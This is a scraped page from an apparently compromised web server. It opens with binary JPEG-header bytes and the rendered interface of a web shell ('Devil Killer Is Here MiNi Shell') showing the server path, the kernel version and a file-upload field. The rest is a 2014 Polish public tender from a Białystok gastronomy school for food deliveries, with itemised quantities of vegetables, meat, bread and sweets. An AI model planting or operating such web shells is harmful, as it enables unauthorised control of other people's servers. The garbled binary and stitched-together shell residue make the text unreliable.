JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141210/404250-N-2014.html

<p class="kh_header"><b>Białystok: 2 Sukcesywny zakup i dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 404250 - 2014; data zamieszczenia: 10.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Gastronomicznych , ul. Knyszyńska 12, 15-702 Białystok, woj. podlaskie, tel. 85 6513854, faks 85 6513405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zsg.bialystok.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 2 Sukcesywny zakup i dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET	1A	Rośliny uprawne, produkty warzywnictwa i ogrodnictwa
PAKIET	3A	Ryby świeże, przetworzone oraz śledzie
PAKIET	4A	Ziemniaki
PAKIET	5A	Produkty zwierzęce, mięso i produkty mięsne
PAKIET	11A	Produkty cukiernicze w gastronomii
PAKIET	12A	Pieczywo
PAKIET	13A	Cukier, kawa, herbata, słodycze, napoje, alkohol.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1, 15.20.00.00-0, 15.31.00.00-4, 15.10.00.00-9, 15.80.00.00-6, 15.81.00.00-9, 15.90.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełnia warunki udziału w postępowaniu, o których mowa w pkt 3, poprzez złożenie przez wykonawcę oświadczenia wynikającego z art. 44 ustawy (wzór - zał. stosownie dla właściwego PAKIETU) i tym samym wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert świadczył dostawy minimum trzem podmiotom  w zakresie objętym zamówieniem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć następujące informacje i dokumenty:
a)	formularz ofertowy (wzór - zał. stosownie dla właściwego PAKIETU - FORMULARZ OFERTOWY W TRYBIE PRZETARGU NIEOGRANICZONEGO);
b)	OŚWIADCZENIE NR 3 o czasie realizacji zamówienia uzupełniającego (wyrażoną w pełnych godzinach od 1 do 4 godzin)
c)	pełnomocnictwo do podpisywania oferty oraz do podpisywania zobowiązań w imieniu wykonawcy/konsorcjum (np. jeśli ofertę podpisuje osoba/osoby nie figurujące w odpisie z właściwego rejestru);
d)	listę podmiotów należących do tej samej grupy kapitałowej w przypadku gdy Wykonawca należy do grupy kapitałowej o  której mowa w art. 24 ust. 2 pkt 5 ustawy;
5)	Złożenie przez wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania jest karalne.
6)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w ppkt. 2 lit. b-f, może przedłożyć równoważne dokumenty określone Rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2013 poz. 231).tj. dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
7)	Na podstawie art. 26 ust. 2b ustawy wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
8)	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółka cywilna, konsorcjum), każdy z wykonawców składa oddzielnie dokumenty wymienione w ppkt 2.
9)	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 4 godzin) - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w zakresie terminu realizacji zamówienia w przypadku powstania okoliczności, których nie można było wcześniej przewidzieć, a które uniemożliwiają realizację zamówienia w pożądanym terminie oraz w przypadku zmiany obowiązujących przepisów prawa związanych z przedmiotowym zamówieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zsg.bialystok.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Gastronomicznych ul. Knyszyńska 12 , 15-702 Białystok, pok. BIURA CKP telefon/fax: /85/6512-989.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2014 godzina 10:00, miejsce: Zespół Szkół Gastronomicznych ul. Knyszyńska 12 , 15-702 Białystok, pok. BIURA CKP.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1 A Rośliny uprawne, produkty warzywnictwa i ogrodnictwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	bakłażan	kg	3,00
2	botwina	kg	9,60
3	buraki	kg	771,40
4	cebula biała	kg	1126,65
5	cebula czerwona	kg	6,92
6	cukinia	kg	12,25
7	czosnek  (główki)	kg	24,50
8	dynia żółta	kg	30,70
9	fasola biała drobna	kg	163,20
10	fasolka szparagowa	kg	2,00
11	groch połówki	kg	182,70
12	kalarepa	kg	2,70
13	kapusta biała 	kg	1722,30
14	kapusta biała młoda	kg	430,20
15	kapusta czerwona	kg	166,00
16	kapusta pekińska	kg	198,05
17	kapusta włoska	kg	2,50
18	koper	kg	26,09
19	mak	kg	40,70
20	marchew	kg	465,05
21	ogórki świeże	kg	382,25
22	papryka świeża	kg	153,91
23	pieczarki	kg	763,60
24	pietruszka w korzeniu	kg	80,35
25	pietruszka zielona natka zwykła	pęczek	327
26	pietruszka zielona natka karbowana	pęczek	53
27	pomidorki coctailowe	kg	1,70
28	pomidory świeże	kg	275,05
29	pory	kg	211,40
30	rzepa  SOPEL LODU	kg	102,30
31	rzodkiewka	pęczek	114
32	sałata karbowana	kg	5,40
33	sałata lodowa	kg	41,30
34	sałata masłowa	kg	65,90
35	seler naciowy	kg	2,85
36	selery w korzeniu	kg	88,24
37	soczewica	kg	15,60
38	szczypior	kg	32,73
39	ziarno sezamu (białe)	kg	6,38
40	avokado 	kg	0,40
41	banany	kg	45,30
42	borówka amerykańska	kg	0,50
43	cytryny 	kg	210,55
44	granaty	szt.	14
45	gruszki deserowe	kg	28,80
46	jabłka	kg	595,35
47	jabłka deserowe	kg	130,40
48	kiwi	kg	4,20
49	łuskane pestki dyni	kg	1,60
50	łuskane pestki słonecznika	kg	2,85
51	mandarynki	kg	36,25
52	melony	kg	21,78
53	morele świeże	kg	5,00
54	mięta świeża	szt.	4
55	nektarynki	kg	4
56	orzechy włoskie łuskane	kg	30,25
57	pomarańcze	kg	12,40
58	rabarbar	kg	15,30
59	rodzynki	kg	24,80
60	suszone gruszki	kg	6,45
61	suszone jabłka	kg	4,35
62	śliwki świeże	kg	32,5
63	śliwki wędzone (kalifornijskie)	kg	6,15
64	truskawki	kg	31,20
65	winogrona  mix	kg	81,20
66	żurawina suszona	kg	15,40


 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 4 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 3A	Ryby świeże, przetworzone oraz śledzie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	łosoś świeży filet	kg	4,506
2	łosoś wędzony - plastry	kg	8,16
3	pstrąg świeży patroszony	kg	20,558
4	szczupak świeży patroszony	kg	1,06
5	śledź małosolny 	kg	52,90
6	tuńczyk w puszce ( w oleju w kawałkach, lub w sosie własnym w kawałkach)	szt.	4


 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 4 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 4A	Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ziemniaki jadalne - odmiana IRGA - opakowanie min.  25 kg, max. 30 kg	kg	16225


 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 4 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 5A	Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	boczek surowy wieprzowy bez żeberek	kg	6,36
2	boczek wędzony, parzony bez żeberek 	kg	152,885
3	flaki wołowe suche, krojone	kg	50,40
4	kaczka pekińska	kg	14,50
5	karkowina wieprzowa bez kości, bez tłuszczu, bez skóry, duże porcje	kg	274,658
6	kiełbasa palcówka podsuszana	kg	0,9
7	kiełbasa salami podsuszana	kg	1,66
8	kiełbasa surowa wieprzowa	kg	0,5
9	kiełbasa wieprzowa, podwędzana, zwyczajna	kg	87,186
10	kurczaki świeże, nieoblodzone	kg	658,59
11	łopatka wieprzowa bez kości, bez tłuszczu, bez skóry, duże porcje	kg	801,221
12	cielęcina - górka	kg	1,675
13	ozory wieprzowe	kg	24,56
14	parówki wieprzowe, cienkie	kg	66,804
15	piersi z kurczaka	kg	256,38
16	piersi z indyka	kg	6,35
17	podudzia z kurczaka	kg	124,75
18	polędwica typu SOPOCKA	kg	0,804
19	skrzydełka z kurczaka	kg	13,90
20	schab wieprzowy bez kości, duże porcje	kg	246,83
21	słonina bez skóry	kg	168,73
22	smalec	kg	13
23	szynka wieprzowa bez kości, bez tłuszczu, bez skóry, duże porcje	kg	515,44
24	szynka wieprzowa konserwowa, prasowana, niemielona	kg	11,46
25	udka z kurczaka	kg	36,50
26	udziec z indyka	kg	31,61
27	wątróbka z kurczaka	kg	26,79
28	wędlina drobiowa - szynka z piersi kurczaka lub indyka	kg	2,918
29	wołowina Extra bez kości (udziec wołowy)	kg	83,33
30	wołowina z kością (antrykot)	kg	303,86
31	żeberka wieprzowe, paski	kg	10,1
32	żołądki z kurczaka	kg	9,1


 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 4 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 11A	Produkty cukiernicze w gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	budyń  śmietankowy (opakowania cateringowe min. 1 kg- max. 5 kg)	kg	25,00
2	cukier waniliowy  /opakowania cateringowe min. 1 kg - max. 5 kg/	kg	25,00
3	esencja luzem  (opakowania cateringowe min. 0,8 L - mx. 1 L  )	L	1,80
4	galaretka owocowa,  cytrynowa (opakowania cateringowe min. 1 kg- max. 5 kg)	kg	61,00
5	masa kajmakowa, klasyczna 777,   (opakowania cateringowe 13 kg)	kg	130
6	kakao extra ciemne, o obniżonej zawartości tłuszczu (10-12% tłuszczu), o składzie zawierającym soję, gluten i mleko , pakowane 0,15 kg 	kg	30,00
7	kisiel różne smaki (opakowania cateringowe min. 1 kg, max. 5 kg)	kg	10,00
8	masa cukiernicza  TICCINOMASA (biała) - 2,5 kg 	kg	37,50
9	miód sztuczny, wielokwiatowy  (opakowania cateringowe  5 kg)	kg	84,00
10	nadzienie - jabłka prażone, kostka, zawierające 85 g owoców w 100 g produktu oraz zawierające 0.17 g cukru w 100 g produktu, (opakowania cateringowe 
11 kg)	kg	255
11	nadzienie o smaku jagodowym, zawierające w swym składzie owoce jagodowe, przecier jabłkowy, cukier i skrobię, w 100 g produktu 100 g owoców	kg	169
12	opłatki do tortów	szt.	45
13	wiśnie w żelu (drążone 60% owoców w składzie)  (opakowania cateringowe  3,2 kg)	kg	48
14	polewa kakaowa ciemna, zawierająca cukier, tłuszcz roślinny, utwardzony, kakao w proszku o obniżonej zawartości tłuszczu (8%) , błonnik kakaowy, serwatkę w proszku(mleka), emulgator (lecytyna sojowa), aromat, sól (opakowania cateringowe 20 kg)	kg	176,00
15	masy dekoracyjne do powlekania i dekoracji  tortów   PETTINICE (białe i kolorowe) (opakowania cateringowe min. 1 kg, max.5 kg)	kg	61,25
16	pomada wodna do wykańczania wyrobów ciastkarskich i pieczywa cukierniczego  /opakowania cateringowe  15 kg/	kg	90,00
17	proszek do pieczenia  (opakowania cateringowe  5 kg)	kg	19,00
18	soda oczyszczona (opakowania cateringowe 1 kg)	kg	5,00
19	kremowa śmietanka błyskawiczna w proszku, pakowana 0,06 kg	szt.	20
20	wafle tortowe suche, prostokątne , pakowane 146 g 	szt.	462
21	Wiórki kokosowe , białe, drobno mielone /(opakowania cateringowe 5kg)	kg	57,90
22	Wstążka dekoracyjna spożywcza	kg	3
23	żelatyna wieprzowa, spożywcza naturalna  (opakowania cateringowe min. 1 kg max. 2 kg)	kg	7,50


 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 4 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 12A	Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Batony pszenne	kg	10,22
2	Bułka tarta	kg	275,00
3	Bułki wrocławskie 0,05 kg	szt.	2666
4	Chleb  pszenny 0,5 kg	kg	1467,00
5	Chleb  żytni 0,6 kg lub 0,5 kg	kg	651,70
6	Chleb Pumpernikiel	kg	2,7
7	Chleb tostowy	szt.	4


 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 4 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 13A	Cukier, kawa, herbata, słodycze, napoje, alkohol.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	ciastka kruche	kg	12,56
2	ciasta różne	kg	7,52
3	cukier biały, paczkowany (1kg)	kg	1750,00
4	cukier kostka biała - 1 kg	kg	43,00
5	cukier puder z glukozą - 10 kg	kg	228,40
6	cukrowa posypka kolorowa o smaku owocowym (na barwnikach bezazowych)  - 1 kg	kg	1
7	cukierki czekoladowe wykwintne	kg	8
8	cukierki mleczne typu KRÓWKA - opakowania 4 kg	kg	29
9	cukierki  typu TOFFI czekoladowe opakowania 3 kg	kg	29
10	czekolada gorzka  - opakowania 0,1 kg	kg	7,5
11	herbata expresowa z zawieszką opakowanie min. 50 saszetek  	szt.	2125
12	kawa cappuccino waniliowe, opakowania 1 kg	kg	2

13	kawa naturalna, mielona 250 g (typ ziaren - Arabica, głębokim smakiem i silnym aromatem nie gorsza niż Jacobs Kronung)	kg	1,4
